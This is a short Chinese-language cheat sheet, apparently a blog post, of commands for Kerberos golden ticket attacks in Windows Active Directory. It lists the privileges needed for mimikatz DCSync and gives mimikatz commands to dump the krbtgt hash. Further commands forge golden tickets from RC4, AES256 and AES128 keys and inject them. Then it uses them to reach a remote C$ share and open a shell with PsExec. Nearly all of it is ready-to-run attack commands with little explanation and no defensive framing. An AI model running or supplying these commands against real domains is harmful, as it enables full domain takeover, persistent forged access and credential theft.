关于域渗透Kerberos黄金票据的一些常用命令
关于域渗透Kerberos黄金票据的一些常用命令
lsadump::dcsync的使用条件,获取以下任意一个用户权限:
1、Administrators 组
2、Domain Admins组
3、Enterprise Admins(企业管理员)组
4、域控制器的计算机账户
mimikatz.exe "lsadump::dcsync /domain:x.com /user:krbtgt" > 2.txt exit 普通管理员
Kerberos::golden /user:administrator /domain:X.com /sid:S-1-5-21-3670766156-1148163679-932913256 /krbtgt:6a306a439440491213ab2780e62571e3 /ticket:test1.kirbi
生成票据
kerberos::purge //清空当前所有凭证
kerberos::list //查看当前凭证
kerberos::ptt test1.kirbi
dir \\Win2008-Srv-PC.Xcom\c$
# 使用krbtgt的rc4值:
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /rc4:6a306a439440491213ab2780e62571e3 /user:administrator /ptt
mimikatz# kerberos::purge
# 使用krbtgt的aes256值:
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /aes256:11d966a60877876b3d6c989b4919ea947263f0f0d746d801e832e761c06680d6 /user:administrator /ptt
mimikatz# kerberos::purge
# 使用krbtgt的aes128值:### 失败,默认不是 aes128加密类型
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /aes128:4068038cab008b9b7b28d2e5510a70b6 /user:administrator /ptt
mimikatz# kerberos::purge
# 使用krbtgt的aes256值:
mimikatz# kerberos::golden /domain:test2.com /sid:S-1-5-21-3670766156-1148163679-932913256 /aes256:11d966a60877876b3d6c989b4919ea947263f0f0d746d801e832e761c06680d6
mimikatz# kerberos::purge
PsExec.exe \\Win2008-Srv-PC.x.com cmd.exe
<< 上一篇
下一篇 >>